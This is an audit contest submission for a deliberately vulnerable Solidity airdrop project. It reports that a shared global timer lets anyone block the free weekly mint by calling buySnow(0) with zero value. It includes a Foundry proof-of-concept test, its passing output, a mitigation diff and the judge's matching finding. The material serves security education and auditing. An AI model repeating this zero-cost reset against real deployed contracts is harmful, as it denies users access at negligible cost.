Snowman Merkle Airdrop
AI First Flight #10
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: low
Valid

Global `s_earnTimer` lets an attacker permanently DoS `earnSnow()` for all users at gas-only cost

eliteaja

Description

  • Snow.earnSnow() allows any address to mint one free Snow token per week. The canFarmSnow modifier enforces this cooldown by checking that at least i_farmDuration / FARMING_DURATION seconds have elapsed since s_earnTimer was last set.

  • s_earnTimer is a single global variable updated by every earnSnow() and buySnow() call. An attacker calls buySnow(0) with amount = 0 and msg.value = 0 — a no-op mint that still resets s_earnTimer to the current block — blocking every user from calling earnSnow() for another week. Repeating this once per week creates a permanent DoS at gas-only cost.

// src/Snow.sol
// @> uint256 private s_earnTimer; // single global — not per-user
modifier canFarmSnow() {
// @> if (block.timestamp - s_earnTimer < i_farmDuration / FARMING_DURATION)
revert S__Timer();
_;
}
function buySnow(uint256 amount) external payable {
if (msg.value == (s_buyFee * amount)) {
_mint(msg.sender, amount); // _mint(x, 0) is a no-op
} else {
i_weth.safeTransferFrom(msg.sender, address(this), s_buyFee * amount);
_mint(msg.sender, amount);
}
// @> s_earnTimer = block.timestamp; // always executes, even when amount == 0
}
function earnSnow() external canFarmSnow {
_mint(msg.sender, 1);
// @> s_earnTimer = block.timestamp; // also resets the shared global
}

When amount = 0 and msg.value = 0: s_buyFee * 0 == 0 == msg.value, so the ETH branch executes, _mint(msg.sender, 0) is a no-op, but s_earnTimer = block.timestamp still runs.

Risk

Likelihood:

  • The attack transaction (buySnow{value:0}(0)) costs only gas — no ETH or WETH is spent — making it economically rational for any griever or competitor to execute once per week indefinitely.

  • The canFarmSnow modifier checks a global timer, so a single attacker transaction blocks every user simultaneously regardless of when they last called earnSnow.

Impact:

  • All users lose access to earnSnow(), the only free Snow acquisition path, for as long as the attacker continues the weekly resets.

  • Users are forced to acquire Snow exclusively through buySnow() (paying ETH or WETH), shifting protocol economics in favor of the fee collector.

Proof of Concept

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;
import {Test, console2} from "forge-std/Test.sol";
import {Snow} from "../src/Snow.sol";
import {Snowman} from "../src/Snowman.sol";
import {SnowmanAirdrop} from "../src/SnowmanAirdrop.sol";
import {MockWETH} from "../src/mock/MockWETH.sol";
import {Helper} from "../script/Helper.s.sol";
/// @notice H-003: s_earnTimer is global — buySnow(0) free DoS blocks all earnSnow()
contract PoC_H003_EarnSnowGlobalTimerDoS is Test {
Snow snow;
Snowman nft;
SnowmanAirdrop airdrop;
MockWETH weth;
address alice = makeAddr("alice");
address attacker = makeAddr("attacker");
function setUp() public {
Helper deployer = new Helper();
(airdrop, snow, nft, weth) = deployer.run();
}
function test_poc_H003_global_timer_dos() public {
// After setUp, 5 earnSnow calls happened, and 4 weeks passed.
// Warp 1 more week so alice CAN earn
vm.warp(block.timestamp + 1 weeks);
// Sanity: alice can earn
uint256 aliceBalBefore = snow.balanceOf(alice);
vm.prank(alice);
snow.earnSnow();
assertEq(snow.balanceOf(alice), aliceBalBefore + 1);
console2.log(">> Alice earned 1 Snow normally.");
// ---- Now demonstrate the DoS ----
// Warp 1 week so alice could earn again
vm.warp(block.timestamp + 1 weeks);
// Attacker calls buySnow(0) with 0 ETH — costs only gas
// s_buyFee * 0 = 0, msg.value = 0 => ETH branch executes, mints 0 tokens
// BUT: s_earnTimer = block.timestamp is set, blocking earnSnow for 1 week
vm.prank(attacker);
snow.buySnow{value: 0}(0);
console2.log(">> Attacker called buySnow(0) with 0 ETH (gas only).");
console2.log(">> s_earnTimer reset to now - all users blocked for 1 week.");
// Alice tries to earnSnow immediately — BLOCKED
vm.prank(alice);
vm.expectRevert(Snow.S__Timer.selector);
snow.earnSnow();
console2.log(">> Alice's earnSnow REVERTED with S__Timer.");
// Attacker can repeat this every week indefinitely to permanently DoS earnSnow
vm.warp(block.timestamp + 1 weeks - 1);
vm.prank(attacker);
snow.buySnow{value: 0}(0); // reset again
vm.prank(alice);
vm.expectRevert(Snow.S__Timer.selector);
snow.earnSnow();
console2.log(">> Attacker repeated the reset. Alice still blocked.");
console2.log(">> Perpetual DoS on earnSnow() confirmed at gas-only cost.");
}
}

Steps to run:

forge test --match-test test_poc_H003_global_timer_dos -vv

Output:

[PASS] test_poc_H003_global_timer_dos() (gas: 94902)
Logs:
>> Alice earned 1 Snow normally.
>> Attacker called buySnow(0) with 0 ETH (gas only).
>> s_earnTimer reset to now - all users blocked for 1 week.
>> Alice's earnSnow REVERTED with S__Timer.
>> Attacker repeated the reset. Alice still blocked.
>> Perpetual DoS on earnSnow() confirmed at gas-only cost.

Recommended Mitigation

Replace the global s_earnTimer with a per-user mapping, and remove the timer update from buySnow (purchasing Snow is independent of the earn cooldown):

- uint256 private s_earnTimer;
+ mapping(address => uint256) private s_earnTimer;
modifier canFarmSnow() {
- if (block.timestamp - s_earnTimer < i_farmDuration / FARMING_DURATION)
+ if (block.timestamp - s_earnTimer[msg.sender] < i_farmDuration / FARMING_DURATION)
revert S__Timer();
_;
}
function buySnow(uint256 amount) external payable {
if (msg.value == (s_buyFee * amount)) {
_mint(msg.sender, amount);
} else {
i_weth.safeTransferFrom(msg.sender, address(this), s_buyFee * amount);
_mint(msg.sender, amount);
}
- s_earnTimer = block.timestamp;
}
function earnSnow() external canFarmSnow {
_mint(msg.sender, 1);
- s_earnTimer = block.timestamp;
+ s_earnTimer[msg.sender] = block.timestamp;
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 1 day ago
Submission Judgement Published
Validated
Assigned finding tags:

[L-02] Global Timer Reset in Snow::buySnow Denies Free Claims for All Users

## Description: The `Snow::buySnow` function contains a critical flaw where it resets a global timer `(s_earnTimer)` to the current block timestamp on every invocation. This timer controls eligibility for free token claims via `Snow::earnSnow()`, which requires 1 week to pass since the last timer reset. As a result: Any token purchase `(via buySnow)` blocks all free claims for all users for 7 days Malicious actors can permanently suppress free claims with micro-transactions Contradicts protocol documentation promising **"free weekly claims per user"** ## Impact: * **Complete Denial-of-Service:** Free claim mechanism becomes unusable * **Broken Protocol Incentives:** Undermines core user acquisition strategy * **Economic Damage:** Eliminates promised free distribution channel * **Reputation Harm:** Users perceive protocol as dishonest ```solidity function buySnow(uint256 amount) external payable canFarmSnow { if (msg.value == (s_buyFee * amount)) { _mint(msg.sender, amount); } else { i_weth.safeTransferFrom(msg.sender, address(this), (s_buyFee * amount)); _mint(msg.sender, amount); } @> s_earnTimer = block.timestamp; emit SnowBought(msg.sender, amount); } ``` ## Risk **Likelihood**: • Triggered by normal protocol usage (any purchase) • Requires only one transaction every 7 days to maintain blockage • Incentivized attack (low-cost disruption) **Impact**: • Permanent suppression of core protocol feature • Loss of user trust and adoption • Violates documented tokenomics ## Proof of Concept **Attack Scenario:** Permanent Free Claim Suppression * Attacker calls **buySnow(1)** with minimum payment * **s\_earnTimer** sets to current timestamp (T0) * All **earnSnow()** calls revert for **next 7 days** * On day 6, attacker repeats **buySnow(1)** * New timer reset (T1 = T0+6 days) * Free claims blocked until **T1+7 days (total 13 days)** * Repeat step **4 every 6 days → permanent blockage** **Test Case:** ```solidity // Day 0: Deploy contract snow = new Snow(...); // s_earnTimer = 0 // UserA claims successfully snow.earnSnow(); // Success (first claim always allowed) // Day 1: UserB buys 1 token snow.buySnow(1); // Resets global timer to day 1 // Day 2: UserA attempts claim snow.earnSnow(); // Reverts! Requires day 1+7 = day 8 // Day 7: UserC buys 1 token (day 7 < day 1+7) snow.buySnow(1); // Resets timer to day 7 // Day 8: UserA retries snow.earnSnow(); // Still reverts! Now requires day 7+7 = day 14 ``` ## Recommended Mitigation **Step 1:** Remove Global Timer Reset from `buySnow` ```diff function buySnow(uint256 amount) external payable canFarmSnow { // ... existing payment logic ... - s_earnTimer = block.timestamp; emit SnowBought(msg.sender, amount); } ``` **Step 2:** Implement Per-User Timer in `earnSnow` ```solidity // Add new state variable mapping(address => uint256) private s_lastClaimTime; function earnSnow() external canFarmSnow { // Check per-user timer instead of global if (s_lastClaimTime[msg.sender] != 0 && block.timestamp < s_lastClaimTime[msg.sender] + 1 weeks ) { revert S__Timer(); } _mint(msg.sender, 1); s_lastClaimTime[msg.sender] = block.timestamp; // Update user-specific timer emit SnowEarned(msg.sender, 1); // Add missing event } ``` **Step 3:** Initialize First Claim (Constructor) ```solidity constructor(...) { // Initialize with current timestamp to prevent immediate claims s_lastClaimTime[address(0)] = block.timestamp; } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!